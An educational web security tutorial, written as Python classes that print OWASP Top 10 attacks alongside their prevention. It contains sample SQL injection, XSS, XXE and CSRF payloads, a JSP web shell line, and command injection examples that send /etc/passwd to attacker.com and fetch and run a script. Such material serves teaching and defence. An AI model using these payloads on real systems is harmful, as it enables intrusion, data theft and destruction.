Introduction
Web application attacks are among the most common and dangerous threats in cybersecurity. As organizations increasingly rely on web applications for business operations, customer engagement, and data management, understanding these attacks is essential for building secure applications and protecting sensitive information.
Key Concepts
- OWASP Top 10: The standard awareness document for web application security
- Attack Surface: All points where an attacker can enter a system
- Injection Attacks: Inserting malicious code into applications
- Authentication & Session Management: Securing user identities and sessions
- Input Validation: Ensuring data is properly validated before processing
1. The OWASP Top 10 Framework
OWASP Top 10 (2021)
owasp_top_10 = {
1: {
"name": "Broken Access Control",
"description": "Users can act outside of their intended permissions",
"examples": ["IDOR", "Privilege escalation", "Missing access controls"]
},
2: {
"name": "Cryptographic Failures",
"description": "Sensitive data exposure due to weak cryptography",
"examples": ["Clear text transmission", "Weak encryption", "Hardcoded keys"]
},
3: {
"name": "Injection",
"description": "Untrusted data sent to interpreter as commands",
"examples": ["SQL injection", "Command injection", "LDAP injection"]
},
4: {
"name": "Insecure Design",
"description": "Security flaws at the design/architecture level",
"examples": ["Missing threat modeling", "Insecure defaults", "Business logic flaws"]
},
5: {
"name": "Security Misconfiguration",
"description": "Improperly configured security settings",
"examples": ["Default credentials", "Verbose error messages", "Unpatched systems"]
},
6: {
"name": "Vulnerable and Outdated Components",
"description": "Using components with known vulnerabilities",
"examples": ["Old libraries", "Outdated frameworks", "Unpatched software"]
},
7: {
"name": "Identification and Authentication Failures",
"description": "Weak authentication and session management",
"examples": ["Weak passwords", "Session fixation", "Credential stuffing"]
},
8: {
"name": "Software and Data Integrity Failures",
"description": "Integrity violations in software and data",
"examples": ["CI/CD pipeline compromise", "Insecure deserialization", "Unverified updates"]
},
9: {
"name": "Security Logging and Monitoring Failures",
"description": "Insufficient logging and monitoring",
"examples": ["No audit trails", "Missing alerts", "Delayed incident response"]
},
10: {
"name": "Server-Side Request Forgery (SSRF)",
"description": "Server forced to make unintended requests",
"examples": ["Internal network scanning", "Cloud metadata access", "Port scanning"]
}
}
print("OWASP Top 10 Web Application Risks (2021)")
print("=" * 70)
for rank, details in owasp_top_10.items():
print(f"\n{rank}. {details['name']}")
print(f" Description: {details['description']}")
print(f" Examples: {', '.join(details['examples'])}")
2. Injection Attacks
SQL Injection (SQLi)
class SQLInjection:
"""SQL Injection attack analysis"""
def __init__(self):
self.attack_types = {
"In-band SQLi": {
"description": "Attacker uses same channel for attack and results",
"variants": ["Union-based", "Error-based"],
"detection": "Easy to detect via error messages or union queries",
"severity": "Critical"
},
"Blind SQLi": {
"description": "No visible data transfer, uses boolean/time-based techniques",
"variants": ["Boolean-based", "Time-based"],
"detection": "Harder to detect, requires inference",
"severity": "Critical"
},
"Out-of-band SQLi": {
"description": "Attack uses different channel for data exfiltration",
"variants": ["DNS exfiltration", "HTTP requests"],
"detection": "Very hard to detect, requires network monitoring",
"severity": "Critical"
}
}
self.payloads = [
"' OR '1'='1",
"'; DROP TABLE users; --",
"1' UNION SELECT username, password FROM users--",
"' OR SLEEP(5)--",
"admin'--",
"1; EXEC xp_cmdshell('dir')--"
]
def display_attacks(self):
print("\nSQL Injection Attack Types")
print("=" * 60)
for attack, details in self.attack_types.items():
print(f"\n{attack}:")
print(f" Description: {details['description']}")
print(f" Variants: {', '.join(details['variants'])}")
print(f" Severity: {details['severity']}")
def sample_payloads(self):
print("\nCommon SQL Injection Payloads:")
for i, payload in enumerate(self.payloads, 1):
print(f" {i}. {payload}")
sqli = SQLInjection()
sqli.display_attacks()
sqli.sample_payloads()
SQL Injection Prevention
def sql_injection_prevention():
"""SQL Injection prevention techniques"""
print("\nSQL Injection Prevention")
print("=" * 60)
techniques = {
"Parameterized Queries (Prepared Statements)": {
"description": "Separate SQL logic from data",
"example_python": """
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s",
(username, password))
""",
"effectiveness": "High"
},
"Stored Procedures": {
"description": "Use database stored procedures",
"example": "CALL GetUserByCredentials(username, password)",
"effectiveness": "High (if implemented correctly)"
},
"Input Validation": {
"description": "Validate and sanitize user input",
"techniques": ["Whitelist validation", "Type checking", "Length limits"],
"effectiveness": "Medium"
},
"Least Privilege": {
"description": "Use database accounts with minimal privileges",
"techniques": ["No DDL permissions", "No admin privileges", "Separate read/write accounts"],
"effectiveness": "High"
},
"Web Application Firewall (WAF)": {
"description": "Filter malicious SQL patterns",
"limitations": "Can be bypassed with advanced techniques",
"effectiveness": "Medium"
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'example_python' in details:
print(f" Example:{details['example_python']}")
if 'techniques' in details:
print(f" Techniques: {', '.join(details['techniques'])}")
print(f" Effectiveness: {details['effectiveness']}")
sql_injection_prevention()
Command Injection
def command_injection():
"""Command injection analysis"""
print("\nCommand Injection Attacks")
print("=" * 60)
print("""
Command injection occurs when an attacker executes arbitrary commands on the host operating system.
Common Vulnerable Functions:
• system(), exec(), shell_exec(), passthru() (PHP)
• os.system(), subprocess.call() (Python)
• Runtime.exec() (Java)
• eval(), exec() (JavaScript/Node.js)
Example Attack Scenarios:
1. Input: 127.0.0.1; cat /etc/passwd
Command: ping 127.0.0.1; cat /etc/passwd
2. Input: file.txt | curl http://attacker.com/steal?data=$(cat /etc/passwd | base64)
3. Input: `wget http://attacker.com/malware.sh && chmod +x malware.sh && ./malware.sh`
Prevention Techniques:
1. Use built-in functions/libraries instead of shell commands
2. Validate and sanitize input (whitelist allowed values)
3. Escape shell metacharacters
4. Use safer APIs (subprocess.run with list arguments)
5. Run applications with least privilege
6. Implement input validation on both client and server
""")
print("\nPython Safe Example:")
print("""
# UNSAFE
import os
os.system("ping " + user_input)
# SAFE
import subprocess
subprocess.run(["ping", user_input], capture_output=True)
""")
command_injection()
3. Cross-Site Scripting (XSS)
XSS Attack Types
class XSSAttacks:
"""Cross-Site Scripting analysis"""
def __init__(self):
self.xss_types = {
"Reflected XSS": {
"description": "Malicious script reflected off web server",
"example": "https://example.com/search?q=<script>alert('XSS')</script>",
"impact": "One-time execution, targeted phishing",
"detection": "Easiest to detect, common in search forms"
},
"Stored XSS (Persistent)": {
"description": "Malicious script permanently stored on server",
"example": "Comment field containing <script>stealCookies()</script>",
"impact": "All users viewing the page are affected",
"detection": "Harder to detect, persistent threat"
},
"DOM-based XSS": {
"description": "Vulnerability in client-side JavaScript",
"example": "document.write(location.hash) with #<script>alert(1)</script>",
"impact": "Never reaches server, harder to detect",
"detection": "Requires code review, client-side analysis"
},
"Self-XSS": {
"description": "User executing script against themselves",
"example": "Social engineering to paste malicious code into console",
"impact": "Limited to single user, often social engineering",
"detection": "Requires user awareness training"
}
}
self.payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg/onload=alert('XSS')>",
"javascript:alert('XSS')",
"<body onload=alert('XSS')>",
"';alert('XSS');//"
]
def display_attacks(self):
print("\nXSS Attack Types")
print("=" * 60)
for attack, details in self.xss_types.items():
print(f"\n{attack}:")
print(f" Description: {details['description']}")
print(f" Example: {details['example']}")
print(f" Impact: {details['impact']}")
print(f" Detection: {details['detection']}")
def sample_payloads(self):
print("\nCommon XSS Payloads:")
for i, payload in enumerate(self.payloads, 1):
print(f" {i}. {payload}")
xss = XSSAttacks()
xss.display_attacks()
xss.sample_payloads()
XSS Prevention
def xss_prevention():
"""XSS prevention techniques"""
print("\nXSS Prevention Techniques")
print("=" * 70)
techniques = {
"Output Encoding": {
"description": "Encode data before rendering in HTML",
"examples": [
"HTML encode: < becomes <",
"JavaScript encode: \x3C becomes <",
"URL encode: %3C becomes <"
],
"contexts": ["HTML body", "HTML attributes", "JavaScript", "CSS", "URLs"]
},
"Content Security Policy (CSP)": {
"description": "Browser security layer to prevent XSS",
"headers": [
"Content-Security-Policy: default-src 'self'",
"script-src 'self' https://trusted.cdn.com",
"object-src 'none'"
],
"directives": [
"default-src", "script-src", "style-src", "img-src", "connect-src"
]
},
"Input Validation": {
"description": "Validate and sanitize user input",
"techniques": [
"Whitelist validation (allow only expected characters)",
"Data type validation",
"Length limits",
"Regular expression validation"
]
},
"HttpOnly and Secure Flags": {
"description": "Protect cookies from JavaScript access",
"flags": [
"HttpOnly - Prevent JavaScript access to cookies",
"Secure - Only transmit over HTTPS",
"SameSite - Restrict cross-origin requests"
]
},
"Framework Security Features": {
"description": "Use framework features that auto-escape output",
"examples": [
"React: JSX automatically escapes",
"Angular: Sanitizes by default",
"Django: Auto-escapes templates",
"Ruby on Rails: Escapes output"
]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'examples' in details:
print(" Examples:")
for example in details['examples'][:3]:
print(f" • {example}")
xss_prevention()
4. Cross-Site Request Forgery (CSRF)
CSRF Attack Analysis
class CSRFAttack:
"""Cross-Site Request Forgery analysis"""
def __init__(self):
self.csrf_scenarios = {
"GET-based CSRF": {
"description": "Using image tags or links to trigger requests",
"example": '<img src="https://bank.com/transfer?to=hacker&amount=1000">',
"requirements": "GET-based state-changing operations",
"mitigation": "Use POST for state changes"
},
"POST-based CSRF": {
"description": "Using auto-submitting forms",
"example": '''
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="to" value="hacker">
<input type="hidden" name="amount" value="1000">
</form>
<script>document.forms[0].submit();</script>
''',
"requirements": "Forms that auto-submit",
"mitigation": "CSRF tokens"
},
"Multi-step CSRF": {
"description": "Chaining multiple requests for complex actions",
"example": "First create account, then transfer funds",
"requirements": "Multiple vulnerable endpoints",
"mitigation": "CSRF tokens on each step"
},
"Login CSRF": {
"description": "Forcing user to log into attacker-controlled account",
"example": "Force login to monitor victim's activity",
"requirements": "Insecure login forms",
"mitigation": "CSRF tokens on login forms"
}
}
self.detection_methods = [
"Missing CSRF tokens in forms",
"GET requests modifying state",
"No origin/referer validation",
"Predictable or missing anti-CSRF tokens",
"CORS misconfigurations"
]
def display_attacks(self):
print("\nCSRF Attack Scenarios")
print("=" * 60)
for scenario, details in self.csrf_scenarios.items():
print(f"\n{scenario}:")
print(f" Description: {details['description']}")
print(f" Example: {details['example'][:80]}...")
print(f" Mitigation: {details['mitigation']}")
def detection_methods(self):
print("\nCSRF Detection Indicators:")
for method in self.detection_methods:
print(f" • {method}")
csrf = CSRFAttack()
csrf.display_attacks()
csrf.detection_methods()
CSRF Prevention
def csrf_prevention():
"""CSRF prevention techniques"""
print("\nCSRF Prevention Techniques")
print("=" * 70)
techniques = {
"CSRF Tokens (Synchronizer Token Pattern)": {
"implementation": """
# Server generates unique token per session/request
token = generate_csrf_token()
store_in_session(token)
# Include in forms
<input type="hidden" name="csrf_token" value="{{ token }}">
# Validate on submission
if request.POST['csrf_token'] != session['csrf_token']:
reject_request()
""",
"advantages": "Highly effective when properly implemented",
"challenges": "Requires server-side state"
},
"SameSite Cookies": {
"implementation": "Set-Cookie: session=abc123; SameSite=Strict; Secure",
"values": [
"Strict: Never sent cross-origin",
"Lax: Sent for top-level navigation",
"None: Sent cross-origin (requires Secure)"
],
"advantages": "Built-in browser protection, no server-side state",
"compatibility": "Modern browsers only"
},
"Double Submit Cookie": {
"implementation": """
# Set random cookie
Set-Cookie: csrf_token=random_value
# Include same value in request
<input type="hidden" name="csrf_token" value="random_value">
# Validate both match
""",
"advantages": "Stateless, works across subdomains",
"challenges": "Requires secure cookie handling"
},
"Origin/Referer Validation": {
"implementation": """
# Validate Origin header
if request.headers['Origin'] not in allowed_origins:
reject()
# Or validate Referer
if not request.headers['Referer'].startswith('https://site.com'):
reject()
""",
"advantages": "No token required",
"limitations": "Can be spoofed, not always present"
},
"Custom Headers": {
"implementation": "X-Requested-By: XMLHttpRequest",
"advantages": "Browsers don't send custom headers cross-origin automatically",
"limitations": "Only works for AJAX requests"
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
if 'implementation' in details:
print(f" Implementation:{details['implementation']}")
if 'advantages' in details:
print(f" Advantages: {details['advantages']}")
if 'challenges' in details:
print(f" Challenges: {details['challenges']}")
csrf_prevention()
5. Broken Access Control
IDOR (Insecure Direct Object References)
class IDORAttack:
"""IDOR (Insecure Direct Object Reference) analysis"""
def __init__(self):
self.vulnerable_patterns = [
{"url": "/user/profile?user_id=123", "risk": "Attacker can change ID to view others"},
{"url": "/api/orders/12345", "risk": "Sequential IDs allow enumeration"},
{"url": "/download?file=invoice_123.pdf", "risk": "Path traversal possible"},
{"url": "/admin/users?action=edit&uid=5", "risk": "Privilege escalation"},
{"url": "/api/v1/accounts/{account_number}", "risk": "Predictable account numbers"}
]
self.access_control_issues = [
"Missing authorization checks",
"Client-side controls only",
"Predictable identifiers",
"Default privileges too broad",
"Role escalation vulnerabilities"
]
def display_vulnerabilities(self):
print("\nIDOR Vulnerable Patterns")
print("=" * 60)
for pattern in self.vulnerable_patterns:
print(f"\nURL Pattern: {pattern['url']}")
print(f" Risk: {pattern['risk']}")
def exploitation_examples(self):
print("\nIDOR Exploitation Examples:")
examples = [
"1. User ID enumeration: /user/1, /user/2, /user/3",
"2. Order ID guessing: /order/100001, /order/100002",
"3. File download: /download?id=123, change to 124",
"4. API parameter manipulation: ?user_id=123 to ?user_id=124",
"5. Hash ID decoding: /document/abc123 (if predictable hash)"
]
for example in examples:
print(f" {example}")
idor = IDORAttack()
idor.display_vulnerabilities()
idor.exploitation_examples()
Access Control Best Practices
def access_control_best_practices():
"""Access control best practices"""
print("\nAccess Control Best Practices")
print("=" * 70)
practices = {
"Deny by Default": {
"description": "No access unless explicitly granted",
"implementation": "Implement role-based access control (RBAC)",
"example": """
if user.has_permission('edit_user', target_user):
perform_edit()
else:
deny_access()
"""
},
"Server-Side Enforcement": {
"description": "All access controls must be enforced server-side",
"rule": "Never trust client-side access controls",
"violations": [
"Hiding admin links (can still access URL)",
"Client-side role checks",
"Session data stored client-side"
]
},
"Object-Level Authorization": {
"description": "Check permissions for each object accessed",
"checklist": [
"Can user view this record?",
"Can user edit this record?",
"Can user delete this record?",
"Can user access this file?"
]
},
"Use Non-Predictable Identifiers": {
"description": "Use UUIDs instead of sequential IDs",
"example": "/api/user/a1b2c3d4-5678-90ab-cdef-1234567890ab",
"benefits": ["Prevents enumeration", "No guessing"]
},
"Implement Proper Authorization Checks": {
"components": [
"Authentication first",
"Role/group membership",
"Resource ownership",
"Action permissions",
"Context restrictions"
]
}
}
for practice, details in practices.items():
print(f"\n{practice}:")
print(f" {details['description']}")
if 'implementation' in details:
print(f" Implementation: {details['implementation']}")
if 'example' in details:
print(f" Example:{details['example']}")
access_control_best_practices()
6. Authentication Attacks
Credential Attacks
class AuthenticationAttacks:
"""Authentication attack analysis"""
def __init__(self):
self.attack_types = {
"Credential Stuffing": {
"description": "Using breached credentials from other sites",
"tools": ["SentryMBA", "OpenBullet", "SNIPR"],
"mitigation": ["MFA", "Rate limiting", "CAPTCHA", "Breach detection"],
"success_rate": "0.1-2% depending on controls"
},
"Password Spraying": {
"description": "Trying common passwords across many accounts",
"technique": "Try 'Password123' on many accounts, avoid lockout",
"mitigation": ["Password complexity", "MFA", "Account lockout after few attempts"],
"targets": ["Common passwords", "Seasonal patterns", "Default passwords"]
},
"Brute Force": {
"description": "Systematic guessing of credentials",
"types": ["Dictionary attacks", "Hybrid attacks", "Mask attacks"],
"mitigation": ["Rate limiting", "Account lockout", "CAPTCHA"],
"tools": ["Hydra", "John the Ripper", "Hashcat"]
},
"Session Fixation": {
"description": "Force victim to use attacker-controlled session",
"technique": "Provide session ID, wait for victim to authenticate",
"mitigation": ["Regenerate session on login", "Reject session IDs from URLs"]
},
"Session Hijacking": {
"description": "Steal valid session tokens",
"methods": ["XSS", "Network sniffing", "Malware", "Session prediction"],
"mitigation": ["HTTPS only", "HttpOnly cookies", "Short session lifetimes"]
}
}
def display_attacks(self):
print("\nAuthentication Attacks")
print("=" * 70)
for attack, details in self.attack_types.items():
print(f"\n{attack}:")
print(f" Description: {details['description']}")
print(f" Mitigation: {', '.join(details['mitigation'])}")
if 'success_rate' in details:
print(f" Success Rate: {details['success_rate']}")
auth_attacks = AuthenticationAttacks()
auth_attacks.display_attacks()
Multi-Factor Authentication (MFA) Bypass
def mfa_bypass_techniques():
"""MFA bypass techniques"""
print("\nMFA Bypass Techniques")
print("=" * 60)
techniques = {
"SMS/OTP Interception": {
"methods": [
"SIM swapping (social engineering mobile carrier)",
"SS7 protocol vulnerabilities",
"Malware intercepting SMS",
"Phone number recycling"
],
"prevention": ["Use authenticator apps instead", "Hardware tokens"]
},
"Push Notification Fatigue": {
"description": "Send repeated MFA prompts until user approves",
"example": "Spam user with MFA requests, hope they approve one",
"prevention": ["Require numeric match", "Limit notification frequency"]
},
"Man-in-the-Middle (MITM)": {
"methods": [
"Evilginx (reverse proxy capturing credentials and tokens)",
"DNS spoofing",
"SSL stripping"
],
"prevention": ["Certificate pinning", "WebAuthn", "Hardware tokens"]
},
"Backup Code Abuse": {
"description": "Attack backup codes if available",
"technique": "Social engineering or malware to obtain backup codes",
"prevention": ["Encrypt backup codes", "Separate storage"]
},
"OAuth Token Theft": {
"description": "Steal OAuth tokens from logs, memory, or network",
"prevention": ["Short-lived tokens", "Token binding", "Revocation mechanisms"]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
if 'methods' in details:
print(" Methods:")
for method in details['methods']:
print(f" • {method}")
if 'description' in details:
print(f" Description: {details['description']}")
if 'prevention' in details:
print(f" Prevention: {', '.join(details['prevention'])}")
mfa_bypass_techniques()
7. Server-Side Request Forgery (SSRF)
SSRF Attack Analysis
class SSRFAttack:
"""Server-Side Request Forgery analysis"""
def __init__(self):
self.ssrf_scenarios = {
"URL Parameter": {
"example": "https://site.com/proxy?url=http://internal-server/admin",
"risk": "Access internal services"
},
"File Upload": {
"example": "Upload image from URL: http://169.254.169.254/latest/meta-data/",
"risk": "Cloud metadata exposure"
},
"Webhooks": {
"example": "Configure webhook URL to internal service",
"risk": "Internal network scanning"
},
"Document Parsers": {
"example": "Parse external XML/SVG containing internal URLs",
"risk": "Port scanning, service enumeration"
},
"PDF Generation": {
"example": "Generate PDF from URL that points to internal services",
"risk": "Internal page capture"
}
}
self.bypass_techniques = [
"Using different IP representations (127.0.0.1, 0x7f000001)",
"Using redirects (301/302 to internal addresses)",
"DNS rebinding attacks",
"IPv6 addresses (::1)",
"URL encoding and double encoding",
"Using other protocols (file://, gopher://, dict://)",
"CIDR notation bypasses"
]
def display_scenarios(self):
print("\nSSRF Attack Scenarios")
print("=" * 60)
for scenario, details in self.ssrf_scenarios.items():
print(f"\n{scenario}:")
print(f" Example: {details['example']}")
print(f" Risk: {details['risk']}")
def bypass_techniques(self):
print("\nSSRF Bypass Techniques:")
for technique in self.bypass_techniques:
print(f" • {technique}")
ssrf = SSRFAttack()
ssrf.display_scenarios()
ssrf.bypass_techniques()
SSRF Prevention
def ssrf_prevention():
"""SSRF prevention techniques"""
print("\nSSRF Prevention Techniques")
print("=" * 70)
techniques = {
"Allow List Approach": {
"description": "Only allow requests to approved domains",
"implementation": """
allowed_domains = ['api.example.com', 'cdn.example.com']
if urlparse(request_url).hostname not in allowed_domains:
return error()
""",
"limitations": "Can be bypassed with redirects"
},
"Disable Redirects": {
"description": "Do not follow HTTP redirects",
"implementation": "http_client.follow_redirects = False",
"risks": "Legitimate applications may require redirects"
},
"Network Segmentation": {
"description": "Isolate application from internal networks",
"implementations": [
"Use network firewalls",
"Run application in isolated VPC",
"Use security groups"
]
},
"Response Validation": {
"description": "Validate and limit response size/content",
"techniques": [
"Limit response size",
"Validate content type",
"Strip sensitive headers"
]
},
"Use Dedicated Libraries": {
"description": "Use libraries designed for external requests",
"options": [
"Use http client with safe defaults",
"Implement timeout limits",
"Use URL parsing libraries"
]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'implementation' in details:
print(f" Implementation:{details['implementation']}")
ssrf_prevention()
8. XML External Entity (XXE) Attacks
XXE Analysis
class XXEAttack:
"""XML External Entity attack analysis"""
def __init__(self):
self.xxe_payloads = {
"File Disclosure": {
"payload": """
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
""",
"impact": "Read arbitrary files"
},
"SSRF (HTTP Request)": {
"payload": """
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
""",
"impact": "Internal network scanning"
},
"Denial of Service (Billion Laughs)": {
"payload": """
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
""",
"impact": "Resource exhaustion, memory consumption"
},
"Remote Code Execution": {
"payload": """
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
""",
"impact": "Command execution (requires PHP expect extension)",
"note": "Limited to certain environments"
}
}
def display_payloads(self):
print("\nXXE Attack Payloads")
print("=" * 70)
for attack, details in self.xxe_payloads.items():
print(f"\n{attack}:")
print(f" Impact: {details['impact']}")
print(f" Payload:{details['payload'][:100]}...")
xxe = XXEAttack()
xxe.display_payloads()
XXE Prevention
def xxe_prevention():
"""XXE prevention techniques"""
print("\nXXE Prevention Techniques")
print("=" * 70)
techniques = {
"Disable External Entities": {
"description": "Disable DTD processing entirely when possible",
"implementation": {
"PHP": 'libxml_disable_entity_loader(true)',
"Java": 'DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)',
"Python": 'defusedxml.defuse_stdlib()',
".NET": 'XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit'
}
},
"Use Safe Parsers": {
"description": "Use libraries designed to prevent XXE",
"options": [
"defusedxml (Python)",
"OWASP Java HTML Sanitizer",
"Safe XML parsers"
]
},
"Input Validation": {
"description": "Validate XML content before processing",
"checks": [
"Disallow DOCTYPE declarations",
"Validate schema",
"Limit entity expansion",
"Check for external references"
]
},
"Upgrade Legacy Systems": {
"description": "Update older libraries and frameworks",
"focus": ["libxml2", "XML libraries", "Document parsing components"]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'implementation' in details:
print(" Implementation:")
for lang, code in details['implementation'].items():
print(f" • {lang}: {code}")
xxe_prevention()
9. Deserialization Attacks
Insecure Deserialization
class DeserializationAttack:
"""Insecure deserialization analysis"""
def __init__(self):
self.attack_vectors = {
"PHP Object Injection": {
"vulnerability": "Unserialize() on user-controlled input",
"exploit": "Craft serialized objects to trigger magic methods",
"gadget_chains": [
"__destruct()",
"__wakeup()",
"__toString()",
"__call()"
]
},
"Java Deserialization": {
"vulnerability": "ObjectInputStream.readObject()",
"exploit": "Apache Commons Collections, Spring, etc.",
"tools": ["ysoserial", "JRMPListener"]
},
"Python Pickle": {
"vulnerability": "pickle.loads() on untrusted data",
"exploit": "__reduce__ method to execute arbitrary code",
"payload": "S'whoami'\np0\n."
},
"JSON Serialization": {
"vulnerability": "Type confusion in custom deserializers",
"exploit": "Polymorphic deserialization with unexpected types",
"mitigation": "Type whitelisting"
},
"YAML Deserialization": {
"vulnerability": "Ruby YAML.load, PyYAML.load",
"exploit": "Remote code execution via object instantiation",
"examples": ["!ruby/object", "!!python/object/new"]
}
}
def display_attacks(self):
print("\nInsecure Deserialization Attack Vectors")
print("=" * 80)
for lang, details in self.attack_vectors.items():
print(f"\n{lang}:")
print(f" Vulnerability: {details['vulnerability']}")
print(f" Exploit: {details['exploit']}")
if 'gadget_chains' in details:
print(f" Gadget Chains: {', '.join(details['gadget_chains'])}")
if 'tools' in details:
print(f" Tools: {', '.join(details['tools'])}")
deserialization = DeserializationAttack()
deserialization.display_attacks()
Deserialization Prevention
def deserialization_prevention():
"""Insecure deserialization prevention"""
print("\nDeserialization Prevention Techniques")
print("=" * 70)
techniques = {
"Avoid Deserializing Untrusted Data": {
"description": "Best prevention is not deserializing user input",
"alternatives": [
"Use simple data formats (JSON with type validation)",
"Parse data manually",
"Use serialization formats that don't support code execution"
]
},
"Type Whitelisting": {
"description": "Only allow specific classes to be deserialized",
"implementation": {
"Java": "ObjectInputFilter",
"Python": "pickle.loads with restricted unpickler",
"PHP": "Allowed classes list with unserialize"
}
},
"Integrity Checks": {
"description": "Sign and verify serialized data",
"methods": [
"HMAC signatures",
"Digital signatures",
"Encryption"
]
},
"Run with Least Privilege": {
"description": "Limit what deserialized code can do",
"techniques": [
"Sandboxing",
"Security manager",
"Container isolation"
]
},
"Monitor and Detect": {
"description": "Detect deserialization attacks",
"indicators": [
"Unusual classes in serialized data",
"Large payload sizes",
"Multiple deserialization attempts"
]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'alternatives' in details:
print(" Alternatives:")
for alt in details['alternatives']:
print(f" • {alt}")
deserialization_prevention()
10. API Security Attacks
Common API Attacks
class APIAttacks:
"""API security attack analysis"""
def __init__(self):
self.api_attacks = {
"API Mass Assignment": {
"description": "Attacker modifies unexpected object properties",
"example": "POST /user with {'username':'user','is_admin':true}",
"impact": "Privilege escalation, data tampering",
"prevention": "Use whitelists, explicit property assignment"
},
"GraphQL Introspection": {
"description": "Query GraphQL schema to find attack vectors",
"query": "{ __schema { types { name fields { name } } } }",
"impact": "Information disclosure, attack surface mapping",
"prevention": "Disable introspection in production"
},
"Excessive Data Exposure": {
"description": "API returns more data than needed",
"example": "/api/user/123 returns full user object with password hash",
"impact": "Data leakage",
"prevention": "Selective field returns, use DTOs"
},
"Rate Limiting Bypass": {
"description": "Avoid rate limits through various techniques",
"techniques": ["IP rotation", "User ID rotation", "Distributed attacks"],
"impact": "Brute force, DDoS, account enumeration",
"prevention": "Use multiple rate limiting strategies"
},
"API Versioning Attacks": {
"description": "Attack older API versions with known vulnerabilities",
"example": "/api/v1/ (vulnerable) vs /api/v3/ (fixed)",
"impact": "Bypass security improvements",
"prevention": "Deprecate old versions, force updates"
}
}
def display_attacks(self):
print("\nAPI Security Attacks")
print("=" * 70)
for attack, details in self.api_attacks.items():
print(f"\n{attack}:")
print(f" Description: {details['description']}")
if 'example' in details:
print(f" Example: {details['example']}")
print(f" Impact: {details['impact']}")
print(f" Prevention: {details['prevention']}")
api_attacks = APIAttacks()
api_attacks.display_attacks()
API Security Best Practices
def api_security_best_practices():
"""API security best practices"""
print("\nAPI Security Best Practices")
print("=" * 70)
practices = {
"Authentication": {
"methods": ["OAuth 2.0", "JWT (short-lived)", "API Keys (for services)", "mTLS"],
"requirements": [
"Use HTTPS only",
"Implement token revocation",
"Use short-lived tokens",
"Secure key storage"
]
},
"Authorization": {
"levels": ["Role-based (RBAC)", "Attribute-based (ABAC)", "Policy-based"],
"best_practices": [
"Check authorization per endpoint",
"Implement least privilege",
"Use scope-based permissions"
]
},
"Input Validation": {
"techniques": [
"Validate all inputs",
"Use schema validation (JSON Schema)",
"Type checking",
"Size limits",
"Allowlists over blocklists"
]
},
"Output Encoding": {
"requirements": [
"Use proper content types",
"JSON encoding for APIs",
"Escape data for responses",
"Remove sensitive data"
]
},
"Rate Limiting": {
"strategies": [
"IP-based limiting",
"User-based limiting",
"Endpoint-specific limits",
"Distributed rate limiting",
"Quotas per API key"
],
"response": "Return 429 Too Many Requests with Retry-After header"
}
}
for category, details in practices.items():
print(f"\n{category}:")
if 'methods' in details:
print(" Methods:")
for method in details['methods']:
print(f" • {method}")
if 'requirements' in details:
print(" Requirements:")
for req in details['requirements']:
print(f" • {req}")
if 'techniques' in details:
print(" Techniques:")
for tech in details['techniques']:
print(f" • {tech}")
api_security_best_practices()
11. File Upload Vulnerabilities
File Upload Attacks
class FileUploadAttacks:
"""File upload vulnerability analysis"""
def __init__(self):
self.attack_types = {
"Malicious File Upload": {
"examples": ["webshells", "PHP backdoors", "JSP shells", "ASPX shells"],
"payloads": [
"",
"<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>",
""
],
"impact": "Remote code execution, server compromise"
},
"File Inclusion": {
"description": "Upload file and include it via LFI/RFI",
"example": "Upload .jpg containing PHP, then include via parameter",
"impact": "Code execution"
},
"Cross-Site Scripting (XSS)": {
"description": "Upload HTML/JS file that executes in victim's browser",
"example": "Upload SVG with embedded JavaScript",
"impact": "Session hijacking, data theft"
},
"MIME Type Bypass": {
"description": "Bypass client-side MIME validation",
"techniques": [
"Change Content-Type header",
"Use double extensions (shell.php.jpg)",
"Null byte injection (shell.php%00.jpg)"
],
"impact": "Upload of malicious files"
},
"Path Traversal": {
"description": "Upload files outside intended directory",
"example": "../../../var/www/html/shell.php",
"impact": "Arbitrary file placement"
}
}
def display_attacks(self):
print("\nFile Upload Attacks")
print("=" * 70)
for attack, details in self.attack_types.items():
print(f"\n{attack}:")
if 'examples' in details:
print(f" Examples: {', '.join(details['examples'])}")
if 'payloads' in details:
print(" Payloads:")
for payload in details['payloads'][:2]:
print(f" • {payload}")
if 'description' in details:
print(f" Description: {details['description']}")
print(f" Impact: {details['impact']}")
file_upload = FileUploadAttacks()
file_upload.display_attacks()
Secure File Upload Implementation
def secure_file_upload():
"""Secure file upload best practices"""
print("\nSecure File Upload Best Practices")
print("=" * 70)
practices = {
"Validation Checks": [
"✓ Validate file size limits",
"✓ Validate file type by content (not just extension)",
"✓ Validate file magic numbers",
"✓ Validate file name (sanitize, avoid path traversal)",
"✓ Scan with antivirus/malware scanner"
],
"Server Configuration": [
"✓ Store files outside webroot",
"✓ Use random file names",
"✓ Set restrictive permissions (read-only for web server)",
"✓ Disable script execution in upload directory",
"✓ Use separate domain/subdomain for uploads"
],
"Content Disposition": [
